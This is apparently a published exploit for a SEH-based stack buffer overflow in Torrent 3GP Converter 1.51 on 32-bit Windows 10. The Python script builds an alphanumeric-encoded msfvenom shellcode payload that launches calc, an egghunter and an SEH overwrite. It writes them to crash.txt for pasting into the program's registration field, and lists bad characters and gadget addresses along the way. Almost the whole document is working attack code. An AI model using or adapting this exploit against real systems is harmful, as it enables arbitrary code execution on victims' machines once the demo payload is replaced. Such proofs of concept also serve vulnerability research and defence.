Share
# Exploit Title: Torrent 3GP Converter 1.51 - Stack Overflow (SEH)  
# Exploit Author: boku  
# Date: 2020-01-24  
# Software Vendor: torrentrockyou  
# Vendor Homepage: http://www.torrentrockyou.com  
# Software Link: http://www.torrentrockyou.com/download/tr3gpconverter.exe  
# Version: Torrent 3GP Converter Version 1.51 Build 116  
# Tested On: Windows 10 Home (x86) 10.0.18363 Build 18363  
# Tested On: Windows 10 Education (x86) 10.0.18363 Build 18363  
# Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363  
# Recreate:  
# 1) Download, install, and open Torrent 3GP Converter 1.51 Build 116 for windows x86  
# 2) run python script & open created 'crash.txt' file  
# 3) select-all > copy-all  
# 4) in app, click 'Register' on the bottom  
# 5) in 'Name:' textbox enter 'a'  
# 6) in 'Code:' textbox paste buffer  
# 7) click 'OK', calculator will open & app will crash  
  
#!/usr/bin/python  
  
# Bad Chars   
# \x00 => \x20 # \x0d Truncates buffer # \x2d Gets ejected from buffer  
# \x61-\x6f => \x41-\x4f / ASCII Lower => ASCII Upper  
# \x70-\x7a => \x50-\x5a / ASCII Lower => ASCII Upper  
# \x9a => \x8a # \x9c => \x8c # \x9e => \x8e  
# \xe0-\xef => \xc0-\xcf # \xf0-\xf6 => \xd0-\xd6  
# \xf8-\xfe => \xd8-\xde # \xff => \x9f  
# badChars='\x00\x0d\x2d\x61\x62\x63\64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x9a\x9c\x9e\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xee\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'  
# Max shellcode size is 2384 bytes  
# - First 2384 bytes of our buffer is left unmangled on the stack  
# msfvenom -p windows/exec CMD='calc' -e x86/alpha_upper --format python -v shellcode  
# x86/alpha_upper chosen with final size 447  
# Payload size: 447 bytes  
## msfvenom x86/alpha_uppers GetPC Routine ##  
# [!] Does not work because of the bad chars!  
# Manually replaced with a working version of GetPC for this exploit  
# 89E5 mov ebp, esp  
shellcode = b'\x54\x5D' # push esp # pop ebp  
# DBCD fcmovne st, st(5)  
shellcode += b'\x89\xCF' # mov edi, ecx  
# D975 F4 fstenv [ebp-C]  
shellcode += b'\x47\x47\x90' # inc edi # inc edi # nop  
# 5F pop edi   
shellcode += b'\x90' # nop  
shellcode += b"\x57\x59\x49"  
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"  
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"  
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"  
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"  
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"  
shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x55\x50\x55\x50"  
shellcode += b"\x33\x30\x43\x50\x4b\x39\x4b\x55\x46\x51\x59"  
shellcode += b"\x50\x42\x44\x4c\x4b\x30\x50\x36\x50\x4c\x4b"  
shellcode += b"\x56\x32\x34\x4c\x4c\x4b\x56\x32\x42\x34\x4c"  
shellcode += b"\x4b\x34\x32\x31\x38\x34\x4f\x4e\x57\x50\x4a"  
shellcode += b"\x37\x56\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x35"  
shellcode += b"\x31\x43\x4c\x34\x42\x56\x4c\x47\x50\x39\x51"  
shellcode += b"\x58\x4f\x34\x4d\x45\x51\x59\x57\x4a\x42\x4a"  
shellcode += b"\x52\x46\x32\x56\x37\x4c\x4b\x31\x42\x44\x50"  
shellcode += b"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x50\x4c\x42"  
shellcode += b"\x31\x33\x48\x4b\x53\x51\x58\x45\x51\x4e\x31"  
shellcode += b"\x30\x51\x4c\x4b\x31\x49\x51\x30\x55\x51\x59"  
shellcode += b"\x43\x4c\x4b\x30\x49\x42\x38\x4b\x53\x37\x4a"  
shellcode += b"\x57\x39\x4c\x4b\x47\x44\x4c\x4b\x53\x31\x59"  
shellcode += b"\x46\x46\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"  
shellcode += b"\x34\x4d\x35\x51\x4f\x37\x57\x48\x4d\x30\x53"  
shellcode += b"\x45\x4c\x36\x45\x53\x53\x4d\x4a\x58\x37\x4b"  
shellcode += b"\x43\x4d\x46\x44\x33\x45\x4a\x44\x56\x38\x4c"  
shellcode += b"\x4b\x36\x38\x47\x54\x45\x51\x38\x53\x32\x46"  
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x50\x58\x45"  
shellcode += b"\x4c\x53\x31\x59\x43\x4c\x4b\x45\x54\x4c\x4b"  
shellcode += b"\x33\x31\x38\x50\x4d\x59\x57\x34\x57\x54\x36"  
shellcode += b"\x44\x31\x4b\x51\x4b\x33\x51\x36\x39\x31\x4a"  
shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x51\x4f\x31\x4f\x50"  
shellcode += b"\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d\x51\x4d"  
shellcode += b"\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x48\x32\x35"  
shellcode += b"\x50\x43\x30\x33\x30\x46\x30\x43\x58\x46\x51"  
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f"  
shellcode += b"\x4b\x5a\x50\x38\x35\x39\x32\x31\x46\x53\x58"  
shellcode += b"\x4e\x46\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58"  
shellcode += b"\x55\x47\x4c\x35\x56\x43\x4c\x35\x5a\x4b\x30"  
shellcode += b"\x4b\x4b\x4d\x30\x42\x55\x44\x45\x4f\x4b\x37"  
shellcode += b"\x37\x45\x43\x54\x32\x32\x4f\x42\x4a\x55\x50"  
shellcode += b"\x36\x33\x4b\x4f\x58\x55\x45\x33\x55\x31\x32"  
shellcode += b"\x4c\x43\x53\x35\x50\x41\x41"  
# Stack EggHunter for fun & profit   
egg = 'BOKU'  
hunterOS = '\x41'*(2784-len(egg+egg+shellcode))  
# After executing the code in nSEH, we are left with 88 bytes to create our Hunter  
hunter = '\x4C'*4 # dec esp * 4 / avoid sub bad char / topOfStack=GetPC  
hunter += '\x5B' # pop ebx / EBX=PC  
hunter += '\x80\x43\x29\x20' # add byte [ebx+41], 0x20 / 20+55=7F=jnz  
hunter += '\x80\x43\x33\x20' # add byte [ebx+51], 0x20 / 20+55=7F=jnz  
hunter += '\xB8\x42\x4F\x4B\x55' # mov eax,0x424f4b55  
hunter += '\x54' # push esp  
hunter += '\x59' # pop ecx  
hunter += '\x90'*18 # nop fillers for jnz short -7 loop  
hunter += '\x49' # dec ecx  
hunter += '\x3B\x01' # cmp eax, [ecx]  
hunter += '\x55\xF7' # 75F7 = jnz short -7 / Have to avoid bad \xF- chars  
hunter += '\x51' # push ecx  
hunter += '\x5a' # pop edx  
hunter += '\x4a'*4 # dec edx * 4 / check if second egg matchs  
hunter += '\x3B\x02' # cmp eax, [edx]  
hunter += '\x55\xDF' # jnz short -31 / back to the loop - avoid bad chars  
hunter += '\x83\xc1\04' # add ecx, 0x4 / start of shellcode after eggs  
hunter += '\x31\xd2' # xor edx,edx  
hunter += '\x52' # push edx  
hunter += '\xC6\x44\x24\x02\x4B' # mov byte [esp+0x2],0x4b  
hunter += '\xC6\x44\x24\x01\x44' # mov byte [esp+0x1],0x44  
hunter += '\xC6\x04\x24\x39' # mov byte [esp],0x39  
# [ESP]=0x004b4439 : call ecx | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe]  
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent 3GP Converter\bsvideoconverter.exe)  
hunter += '\xc3' # ret  
huntRmdr = '\x41'*(88-len(hunter))  
nsehOS = '\x90'*(4500-len(egg+egg+shellcode+hunterOS+hunter+huntRmdr))  
nSEH = '\x83\xC4\x04\xC3' # add esp,byte +0x4 # ret  
# 3-byte SEH overwrite using the truncating Null byte  
SEH = '\x0f\x47\x4c' # 0x004c470f : pop esi # pop ebx # ret [bsvideoconverter.exe]   
# ASLR: False, Rebase: False, SafeSEH: False {PAGE_EXECUTE_READWRITE}   
  
payload = egg+egg+shellcode+hunterOS+hunter+huntRmdr+nsehOS+nSEH+SEH  
  
try:  
f=open("crash.txt","w")  
print("[+] Creating %s bytes evil payload." %len(payload))  
f.write(payload)  
f.close()  
print("[+] File created!")  
except:  
print("File cannot be created.")